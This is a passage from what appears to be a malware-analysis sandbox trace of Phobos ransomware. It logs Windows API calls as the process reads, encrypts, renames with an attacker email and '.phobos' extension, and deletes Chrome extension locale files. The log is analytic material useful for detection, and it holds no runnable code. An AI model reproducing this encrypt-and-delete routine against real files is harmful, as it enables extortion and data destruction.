(in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.221] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.221] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfe, lpOverlapped=0x0) returned 1 [0152.221] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0152.221] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0152.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.222] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.222] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.223] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.223] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.223] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.223] CloseHandle (hObject=0x138) returned 1 [0152.223] CloseHandle (hObject=0x130) returned 1 [0152.223] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json")) returned 1 [0152.224] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.225] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=303) returned 1 [0152.225] CloseHandle (hObject=0x130) returned 1 [0152.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json")) returned 0x2020 [0152.227] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.227] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.227] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.227] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.227] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.227] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12f, lpOverlapped=0x0) returned 1 [0152.228] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0152.228] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0152.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.229] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.229] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.229] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.229] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.229] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.229] CloseHandle (hObject=0x130) returned 1 [0152.229] CloseHandle (hObject=0x138) returned 1 [0152.229] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json")) returned 1 [0152.231] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.231] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=229) returned 1 [0152.231] CloseHandle (hObject=0x138) returned 1 [0152.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json")) returned 0x2020 [0152.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.232] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.232] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.233] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.233] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe5, lpOverlapped=0x0) returned 1 [0152.233] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0152.233] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0152.234] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.234] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.234] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.234] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.234] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.234] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.234] CloseHandle (hObject=0x138) returned 1 [0152.234] CloseHandle (hObject=0x130) returned 1 [0152.235] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json")) returned 1 [0152.236] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.236] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=218) returned 1 [0152.236] CloseHandle (hObject=0x130) returned 1 [0152.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json")) returned 0x2020 [0152.236] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.236] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.236] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.237] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.237] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.237] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xda, lpOverlapped=0x0) returned 1 [0152.238] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0152.238] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0152.239] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.239] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.239] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0152.239] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.239] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0152.239] CryptDestroyKey (hKey=0xa327e8) returned 1 [0152.239] CloseHandle (hObject=0x130) returned 1 [0152.239] CloseHandle (hObject=0x138) returned 1 [0152.239] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json")) returned 1 [0152.240] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0152.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.240] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=207) returned 1 [0152.240] CloseHandle (hObject=0x138) returned 1 [0152.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json")) returned 0x2020 [0152.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0152.241] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.241] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0152.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0152.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0152.241] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.241] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcf, lpOverlapped=0x0) returned 1 [0152.242] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0152.242] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0152.243] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0152.243] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0152.243] CryptEncrypt (in: hKey=0xa32d28, 